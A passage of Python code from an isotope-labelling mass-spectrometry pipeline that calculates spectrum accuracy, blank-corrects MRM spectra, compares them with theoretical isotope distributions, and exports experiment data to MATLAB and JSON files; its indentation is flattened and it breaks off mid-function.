def execute_analyzeSpectrumAccuracy(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average spectrum accuracy'''
print('execute_analyzeSpectrumAccuracy...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating spectrum accuracy from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating spectrum accuracy from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating spectrum accuracy for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating spectrum accuracy for metabolite ' + met);
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating spectrum accuracy for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_accuracy = self.calculate_fragmentSpectrumAccuracy(peakSpectrum_normalized_lst);
# update data_stage01_isotopomer_spectrumAccuracy
for frag,accuracy in peakSpectrum_accuracy.items():
if accuracy:
row = [];
row = data_stage01_isotopomer_spectrumAccuracy(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, accuracy, scan_type, True);
self.session.add(row);
self.session.commit();
def execute_analyzeSpectrumAccuracyNormSum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average spectrum accuracy'''
print('execute_analyzeSpectrumAccuracy...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating spectrum accuracy from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating spectrum accuracy from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating spectrum accuracy for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating spectrum accuracy for metabolite ' + met);
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating spectrum accuracy for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normSum(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_accuracy = self.calculate_fragmentSpectrumAccuracy_normSum(peakSpectrum_normalized_lst);
# update data_stage01_isotopomer_spectrumAccuracy
for frag,accuracy in peakSpectrum_accuracy.items():
if accuracy:
row = [];
row = data_stage01_isotopomer_spectrumAccuracyNormSum(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, accuracy, scan_type, True);
self.session.add(row);
self.session.commit();
def execute_makeIsotopomerSimulation_cobraMat(self,csource_name_I, csource_I, csource_mix_I, experiment_id_I, sample_name_abbreviations_I = None, time_points_I = None, met_ids_I = None, scan_types_I = None):
'''export a fluxomics experimental data for simulation using the cobra 2.0 fluxomics module'''
# TODO:
# 1. move to analysis_stage02
# 2. query csource_name, csourse, and csource_mix from database
# calculate the emu for the input_met:
# make carbon input for the experiment:
# 80/20 1-13C/U-13C
#inputfrag = isoexecute.make_CSourceMix([['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O'],
# ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O']],
# [0.8,0.2]);
# 30/20/50 1-13C/U-13C/U-12C
#inputfrag = isoexecute.make_CSourceMix([['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O'],
# ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O'],
# ['CHO','CH2O','CH2O','CH2O','CH2O','CH3O']],
# [0.3,0.2,0.5]);
# 80/20 1-13C/U-13C
#inputfrag = isoexecute.make_CSourceMix([['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O']],
# [1.0]);
inputfrag = self.make_CSourceMix(csource_I,csource_mix_I);
# get experiment information:
met_id_conv_dict = {'Hexose_Pool_fru_glc-D':'glc-D',
'Pool_2pg_3pg':'3pg',
'23dpg':'13dpg'};
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01AveragesNormSum(experiment_id_I);
for tp in time_points:
print('Reporting average precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
# Matlab script file to make the structures
experiment_name = 'Isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp));
filename = 'data/_output/' + 'isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp)) + '.m';
filename_dict = 'data/_output/' + 'isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp)) + '.json';
#filename_mat = 'data/_output/' + 'isotopomer_' + re.sub('[.\/]','',experiment_id_I) + '_' + re.sub(' ','',sna) + '_' + re.sub(' ','',str(tp)) + '.mat';
mat_script = '';
experiment = {};
struct_data = {};
experiment_stdev = [];
#struct_mat_data = {};
#struct_mat_data_list = [];
#struct_mat_dtype_list = [];
print('Reporting average precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Reporting average precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Reporting average precursor and product spectrum for metabolite ' + met);
# format the metabolite
if met in list(met_id_conv_dict.keys()):
met_formatted = met_id_conv_dict[met];
else: met_formatted = met;
met_formatted = re.sub('-','_DASH_',met_formatted)
met_formatted = re.sub('[(]','_LPARANTHES_',met_formatted)
met_formatted = re.sub('[)]','_RPARANTHES_',met_formatted)
# fragments
fragment_formulas = [];
fragment_formulas = self.stage01_isotopomer_query.get_fragmentFormula_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met);
# frag c map
frag_cmap = {};
frag_cmap = self.stage01_isotopomer_query.get_precursorFormulaAndProductFormulaAndCMaps_metID(met,'-','tuning');
for frag in fragment_formulas:
# data
data_mat = [];
data_mat_cv = [];
data_mat, data_mat_cv = self.stage01_isotopomer_query.get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met,frag);
# combine into a structure
frag_tmp_int = [];
frag_tmp_str = [];
for f in frag_cmap[frag]:
if f:
frag_tmp_int.append(1);
frag_tmp_str.append('1');
else:
frag_tmp_int.append(0);
frag_tmp_str.append('0');
fieldname = 'x' + met_formatted+'_'+ re.sub('[-+]','',frag);
#struct_mat_data['x'+met_formatted+'_c'+''.join(frag_tmp_str)] = {'met':'x'+met_formatted+'_c',
# 'fragment':frag_tmp_int,
# 'data':data_mat,
# 'metfrag':'x'+met_formatted+'_c'+''.join(frag_tmp_str)};
mat_script = mat_script + ("%s.fragments.%s.met = '%s';\n" %(experiment_name,fieldname,'x'+met_formatted+'_c'));
mat_script = mat_script + ("%s.fragments.%s.fragment = %s';\n" %(experiment_name,fieldname,frag_tmp_int));
mat_script = mat_script + ("%s.fragments.%s.data = %s';\n" %(experiment_name,fieldname,data_mat));
mat_script = mat_script + ("%s.fragments.%s.metfrag = '%s';\n" %(experiment_name,fieldname,'x'+met_formatted+'_c'+''.join(frag_tmp_str)));
data_names = [];
data_stdev = [];
for i,d in enumerate(data_mat):
stdev = 0.0;
if data_mat_cv[i]: stdev = data_mat[i]*data_mat_cv[i]/100;
data_names.append(fieldname+str(i));
data_stdev.append(stdev);
experiment_stdev.append(stdev);
struct_data[fieldname] = {'met':'x'+met_formatted+'_c','fragment':frag_tmp_int,
'data_names':data_names,'data_ave':data_mat,'data_cv':data_mat_cv,
'data_stdev':data_stdev,'metfrag':'x'+met_formatted+'_c'+''.join(frag_tmp_str)};
#data_mat_reshape = numpy.array(data_mat).reshape((len(data_mat),1));
#frag_tmp_int_reshape = numpy.array(frag_tmp_int).reshape((len(frag_tmp_int),1));
#struct_mat_data = numpy.array([(['x'+met_formatted+'_c'],frag_tmp_int_reshape,data_mat_reshape,['x'+met_formatted+'_c'+''.join(frag_tmp_str)])], dtype=[('met', 'O'), ('fragment', 'O'), ('data', 'O'), ('metfrag', 'O')]);
#struct_mat_dtype = (fieldname.encode('ascii','ignore'),'O');
#struct_mat_data_list.append(struct_mat_data);
#struct_mat_dtype_list.append(struct_mat_dtype);
## dump the experiment to a matlab file
#experiment['input']=[];
##experiment['fragments']=struct_mat_data;
#experiment['fragments']=numpy.array([tuple(struct_mat_data_list)],dtype=struct_mat_dtype_list);
#experiment['ignored']=[];
#experiment['inputfrag']=inputfrag;
#experiment['std2']=0.015;
#experiment_mat = numpy.array([(experiment['fragments'],experiment['inputfrag'],experiment['std2'])],
# dtype = [('fragments','O'),('inputfrag','O'),('std2','O')]);
#savemat(filename_mat,{experiment_name:experiment_mat});
# dump the experiment to a matlab script to generate the matlab file in matlab
mat_script = mat_script + ("%s.input = [];\n" %experiment_name);
mat_script = mat_script + ("%s.ignored = [];\n" %experiment_name);
for k,v in inputfrag.items():
mat_script = mat_script + ("%s.inputfrag.%s = %s;\n" %(experiment_name,k,v));
mat_script = mat_script + ("%s.std2=0.015;\n" %experiment_name);
mat_script = mat_script + ("save('%s','%s');\n" %(experiment_name+'.mat',experiment_name));
with open(filename,'w') as f:
f.write(mat_script);
# dump the experiment to a json file
experiment['fragments']=struct_data;
experiment['inputfrag']={csource_name_I:inputfrag};
experiment['stdev']=numpy.mean(numpy.array(experiment_stdev));
with open(filename_dict,'w') as f:
json.dump(experiment,f,indent=4);
#internal methods:
def build_precursorSpectrumFromMRMs(self,peakSpectrum_I,blankSpectrum_I):
'''extract maximum intensity peak'''
# Input:
# peakSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
# peakSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
# Output:
# peakSpectrum_theoretical = {fragment:{mass:intensity}}
# peakSpectrum_measured = {fragment:{mass:[measuredMass,intensity]}}
# peakSpectrum_corrected = {fragment:{mass:[measuredMass,intensity]}}
# peakSpectrum_normalized = {fragment:{mass:[measuredMass,intensity]}}
fragments_I = list(peakSpectrum_I.keys());
# round all precursor/product masses in input for comparison:
peakSpectrum_copy_I = {};
for frag,spec in peakSpectrum_I.items():
peakSpectrum_tmp = {};
for masses,intensity in spec.items():
peakSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
blankSpectrum_copy_I = {};
for frag,spec in blankSpectrum_I.items():
blankSpectrum_tmp = {};
for masses,intensity in spec.items():
blankSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
blankSpectrum_copy_I[frag] = blankSpectrum_tmp;
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
# determine masses from fragments
masses = [];
peakSpectrum_measured = {};
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_measured[frag] = None;
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
# 1. copy data from peakSpectrum_I to peakSpectrum_measured based on theoretical fragments
# 2. generate corrected spectrum
intensityList = [];
if frag in peakSpectrum_I:
precursor_masses = [k[0] for k in peakSpectrum_copy_I[frag].keys()];
measured_spec = {};
corrected_spec = {};
for i,mass in enumerate(masses_rounded): #iterate through theoretical precursor masses
measured = 0.0;
corrected = 0.0;
if mass in precursor_masses:
product_masses = [k[1] for k in peakSpectrum_copy_I[frag].keys() if k[0]==mass];
for product in product_masses: #iterate through measured product masses
if frag in blankSpectrum_copy_I:
blank_precursor_masses = [k[0] for k in blankSpectrum_copy_I[frag].keys()];
if mass in blank_precursor_masses:
blank_product_masses = [k[1] for k in blankSpectrum_copy_I[frag].keys() if k[0]==mass];
if product in blank_product_masses:
if blankSpectrum_copy_I[frag][(mass,product)]<0.5*peakSpectrum_copy_I[frag][(mass,product)]:
corrected += peakSpectrum_copy_I[frag][(mass,product)]-blankSpectrum_copy_I[frag][(mass,product)];
measured += peakSpectrum_copy_I[frag][(mass,product)]
else:
corrected += 0.0;
measured += peakSpectrum_copy_I[frag][(mass,product)]
else:
corrected += peakSpectrum_copy_I[frag][(mass,product)];
measured += peakSpectrum_copy_I[frag][(mass,product)]
else:
corrected += peakSpectrum_copy_I[frag][(mass,product)];
measured += peakSpectrum_copy_I[frag][(mass,product)]
else:
corrected += peakSpectrum_copy_I[frag][(mass,product)];
measured += peakSpectrum_copy_I[frag][(mass,product)];
measured_spec[masses[i]] = measured;
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_measured[frag] = measured_spec;
peakSpectrum_corrected[frag] = corrected_spec;
# normalize each spectrum:
#NOTE: normalization by max to allow for later conversion to normalization by sum
normalized = {};
intensityListMax = max(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if intensityListMax != 0: normalized[k] = v/intensityListMax;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
def build_productSpectrumFromMRMs(self,peakSpectrum_I,blankSpectrum_I):
'''extract maximum intensity peak'''
# Input:
# peakSpectrum_I = {fragment:{(product_mass,product_mass):intensity}}
# peakSpectrum_I = {fragment:{(product_mass,product_mass):intensity}}
# Output:
# peakSpectrum_theoretical = {fragment:{mass:intensity}}
# peakSpectrum_measured = {fragment:{mass:intensity}}
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
fragments_I = list(peakSpectrum_I.keys());
# round all precursor/product masses in input for comparison:
peakSpectrum_copy_I = {};
for frag,spec in peakSpectrum_I.items():
peakSpectrum_tmp = {};
for masses,intensity in spec.items():
peakSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
blankSpectrum_copy_I = {};
for frag,spec in blankSpectrum_I.items():
blankSpectrum_tmp = {};
for masses,intensity in spec.items():
blankSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
blankSpectrum_copy_I[frag] = blankSpectrum_tmp;
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
# determine masses from fragments
masses = [];
peakSpectrum_measured = {};
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_measured[frag] = None;
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
# 1. copy data from peakSpectrum_I to peakSpectrum_measured based on theoretical fragments
# 2. generate corrected spectrum
intensityList = [];
if frag in peakSpectrum_I:
product_masses = [k[1] for k in peakSpectrum_copy_I[frag].keys()];
measured_spec = {};
corrected_spec = {};
for i,mass in enumerate(masses_rounded): #iterate through theoretical product masses
measured = 0.0;
corrected = 0.0;
if mass in product_masses:
precursor_masses = [k[0] for k in peakSpectrum_copy_I[frag].keys() if k[1]==mass];
for precursor in precursor_masses: #iterate through measured precursor masses
if frag in blankSpectrum_copy_I:
blank_product_masses = [k[1] for k in blankSpectrum_copy_I[frag].keys()];
if mass in blank_product_masses:
blank_precursor_masses = [k[0] for k in blankSpectrum_copy_I[frag].keys() if k[1]==mass];
if precursor in blank_precursor_masses:
if blankSpectrum_copy_I[frag][(precursor,mass)]<0.5*peakSpectrum_copy_I[frag][(precursor,mass)]:
corrected += peakSpectrum_copy_I[frag][(precursor,mass)]-blankSpectrum_copy_I[frag][(precursor,mass)];
measured += peakSpectrum_copy_I[frag][(precursor,mass)]
else:
corrected += 0.0;
measured += peakSpectrum_copy_I[frag][(precursor,mass)]
else:
corrected += peakSpectrum_copy_I[frag][(precursor,mass)];
measured += peakSpectrum_copy_I[frag][(precursor,mass)]
else:
corrected += peakSpectrum_copy_I[frag][(precursor,mass)];
measured += peakSpectrum_copy_I[frag][(precursor,mass)]
else:
corrected += peakSpectrum_copy_I[frag][(precursor,mass)];
measured += peakSpectrum_copy_I[frag][(precursor,mass)];
measured_spec[masses[i]] = measured;
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_measured[frag] = measured_spec;
peakSpectrum_corrected[frag] = corrected_spec;
# normalize each spectrum:
#NOTE: normalization by max to allow for later conversion to normalization by sum
normalized = {};
intensityListMax = max(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if intensityListMax != 0: normalized[k] = v/intensityListMax;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
def compare_peakSpectrum_normMax(self,peakSpectrum_normalized_list_I,return_theoretical = False):
# Input:
# peakSpectrum_normalized_list_I = [{fragment:{mass:intensity}}]
# Output:
# peakSpectrum_stats_O = {fragment:{mass:{'n':integer,
# 'mean':fraction,
# 'stdDev':fraction,
# 'absDev':fraction}}
fragments_all = [];
for row in peakSpectrum_normalized_list_I:
fragments_all.extend(list(row.keys()));
fragments_I = list(set(fragments_all));
#fragments_I = peakSpectrum_normalized_list_I[0].keys();
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
peakSpectrum_stats_O = {};
for frag in fragments_I:
peakSpectrum_stats_O[frag] = {'n':None,
'mean':None,
'stdDev':None,
'absDev':None};
if not peakSpectrum_theoretical[frag]: continue; # no carbons in fragment
intensityList = [];
masses = [];
stats = {};
for peakSpectrum in peakSpectrum_normalized_list_I:
intensityDict = {};
peakSpectrumMasses = list(peakSpectrum_theoretical[frag].keys());
for mass in peakSpectrumMasses:
if frag in peakSpectrum and mass in peakSpectrum[frag] and peakSpectrum[frag][mass] and peakSpectrum[frag][mass] > 0.0:
intensityDict[mass] = peakSpectrum[frag][mass];
else:
intensityDict[mass] = 0.0;
if not mass in masses: masses.append(mass);
intensityList.append(intensityDict);
## uncomment to only compare measured masses
#intensityDict = {};
#peakSpectrumMasses = peakSpectrum[frag].keys();
#for mass in peakSpectrumMasses:
# if peakSpectrum[frag][mass] > 0.0:
# intensityDict[mass] = peakSpectrum[frag][mass];
# if not mass in masses: masses.append(mass);
#intensityList.append(intensityDict);
for mass in masses:
stats[mass] = None;
data = [];
for intensity in intensityList:
if intensity[mass]>0.0:data.append(intensity[mass]);
if data:
intensity_array = numpy.array(data);
if peakSpectrum_theoretical[frag][mass]:abs_dev = abs(intensity_array.mean() - peakSpectrum_theoretical[frag][mass]);
else: abs_dev = None;
stats[mass] = {'n':len(intensity_array),
'mean':intensity_array.mean(),
'stdDev':intensity_array.std(),
'absDev':abs_dev};
else:
stats[mass] = {'n':0.0,
'mean':0.0,
'stdDev':0.0,
'absDev':None};
if stats: peakSpectrum_stats_O[frag] = stats;
if return_theoretical:
return peakSpectrum_stats_O,peakSpectrum_theoretical;
else:
return peakSpectrum_stats_O;
def compare_peakSpectrum_normSum(self,peakSpectrum_normalized_list_I,return_theoretical = False):
# Input:
# peakSpectrum_normalized_list_I = [{fragment:{mass:[measuredMass,intensity]}}]
# Output:
# peakSpectrum_stats_O = {fragment:{mass:{'n':integer,
# 'mean':fraction,
# 'stdDev':fraction,
# 'absDev':fraction}}
fragments_all = [];
for row in peakSpectrum_normalized_list_I:
fragments_all.extend(list(row.keys()));
fragments_I = list(set(fragments_all));
#fragments_I = peakSpectrum_normalized_list_I[0].keys();
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I,True);
peakSpectrum_stats_O = {};
for frag in fragments_I:
peakSpectrum_stats_O[frag] = {'n':None,
'mean':None,
'stdDev':None,
'absDev':None};
if not peakSpectrum_theoretical[frag]: continue; # no carbons in fragment
intensityList = [];
masses = [];
stats = {};
for peakSpectrum in peakSpectrum_normalized_list_I:
intensityDict = {};
peakSpectrumMasses = list(peakSpectrum_theoretical[frag].keys());
for mass in peakSpectrumMasses:
if frag in peakSpectrum and frag in peakSpectrum and mass in peakSpectrum[frag] and peakSpectrum[frag][mass] > 0.0:
intensityDict[mass] = peakSpectrum[frag][mass];
else:
intensityDict[mass] = 0.0;
if not mass in masses: masses.append(mass);
intensityList.append(intensityDict);
## uncomment to only compare measured masses
#intensityDict = {};
#peakSpectrumMasses = peakSpectrum[frag].keys();
#for mass in peakSpectrumMasses:
# if peakSpectrum[frag][mass] > 0.0:
# intensityDict[mass] = peakSpectrum[frag][mass];
# if not mass in masses: masses.append(mass);
#intensityList.append(intensityDict);
for mass in masses:
stats[mass] = None;
data = [];
for intensity in intensityList:
if intensity[mass]>0.0:data.append(intensity[mass]);
if data:
intensity_array = numpy.array(data);
if peakSpectrum_theoretical[frag][mass]:abs_dev = abs(intensity_array.mean() - peakSpectrum_theoretical[frag][mass]);
else: abs_dev = None;
stats[mass] = {'n':len(intensity_array),
'mean':intensity_array.mean(),
'stdDev':intensity_array.std(),
'absDev':abs_dev};
else:
stats[mass] = {'n':0.0,
'mean':0.0,
'stdDev':0.0,
'absDev':None};
if stats: peakSpectrum_stats_O[frag] = stats;
if return_theoretical:
return peakSpectrum_stats_O,peakSpectrum_theoretical;
else:
return peakSpectrum_stats_O;
def report_fragmentSpectrum_normMax(self,fragments_I,round_mass=False):
'''calculate the format spectrum as a list'''
# Input: formula_str_I
# Output: spectrum_lst_O
fragmentSpectrum_tmp = {};
fragmentSpectrum_O = {};
for formula_str_I in fragments_I:
fragmentSpectrum_tmp[formula_str_I] = None;
fragmentSpectrum_O[formula_str_I] = None;
formula_str = re.sub('[+-]', '', formula_str_I);
n12C = 0
n13C = 0
if 'C' not in Formula(formula_str)._elements: continue; #check if a carbon is even contained in the formula
if 0 in Formula(formula_str)._elements['C']:
n12C += Formula(formula_str)._elements['C'][0]; #get the # of Carbons
if 13 in Formula(formula_str)._elements['C']:
n13C += Formula(formula_str)._elements['C'][13]
mnumber = Formula(formula_str).isotope.massnumber #get the nominal mass number
spectrum = Formula(formula_str).spectrum() #get the spectrum
fragmentSpectrum = {}
intensityList = [];
for c in range(-n13C, n12C + 1):
if c<0:
fragmentSpectrum[Formula(formula_str).isotope.mass-1]=0.0;
intensityList.append(0.0);
else:
if mnumber+c in spectrum:
fragmentSpectrum[spectrum[mnumber+c][0]]=spectrum[mnumber+c][1];
intensityList.append(spectrum[mnumber+c][1]);
else:
fragmentSpectrum[Formula(formula_str).isotope.mass + c]=0.0;
intensityList.append(0.0);
fragmentSpectrum_tmp[formula_str_I] = fragmentSpectrum;
# by default, the spectrum is normalized to the sum of all intensities measured
# convert sum-normalized spectrum to max-normalized spectrum
intensityListMax = max(intensityList);
fragmentSpectrum = {};
for k,v in fragmentSpectrum_tmp[formula_str_I].items():
if round_mass:
